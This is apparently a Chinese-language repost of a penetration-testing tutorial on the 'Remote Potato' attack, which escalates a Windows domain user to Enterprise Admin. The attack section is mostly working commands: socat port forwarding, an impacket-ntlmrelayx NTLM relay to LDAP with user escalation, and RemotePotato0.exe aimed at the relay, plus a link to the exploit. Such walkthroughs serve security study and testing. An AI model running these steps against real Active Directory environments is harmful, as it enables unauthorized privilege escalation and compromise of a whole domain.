前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Remote Potato – From Domain User to Enterprise Admin

Remote Potato – From Domain User to Enterprise Admin

作者头像
鸿鹄实验室
发布2021-05-27 15:14:24
5780
发布2021-05-27 15:14:24
举报

本文为翻译文,如有需要可查看原文:

https://pentestlab.blog/2021/05/04/remote-potato-from-domain-user-to-enterprise-admin/

前言

如需复现该漏洞,我们需要开启PS远程管理,开启方法如下

Enable-PSremoting
set-item wsman:localhost\client\trustedhosts -value

可以使用下面的命令来查看我们的目标配置:

Get-PSSessionConfiguration

如有需要,可将指定用户加入到指定组中:

所以该攻击的前提为:

  1. 具有Domain Administrator特权的用户实际上已登录到主机或通过远程桌面登录
  2. 攻击者已获得对主机的初始访问权限,或者已通过WinRM或SSH访问
  3. LDAP和SMB签名未配置

复现

首先使用下面的命令与目标主机建立链接

Enter-PSSession -ComputerName 10.0.0.2 -Authentication Negotiate -Credential $(get-credential)

然后使用socat 进行转发:

sudo stty -tostop
sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:10.0.0.2:9998 &

然后进行中继

 impacket-ntlmrelayx -t ldap://10.0.0.1 --no-wcf-server --escalate-user pentestlab

然后在目标机器上执行remote potato

RemotePotato0.exe -r 10.0.0.3 -p 9998

若成功则用户会被加入到Enterprise Admins组

此时便可以使用任何的横向移动工具获取system权限:

exploit地址:https://github.com/antonioCoco/RemotePotato0

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-05-07,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 鸿鹄实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档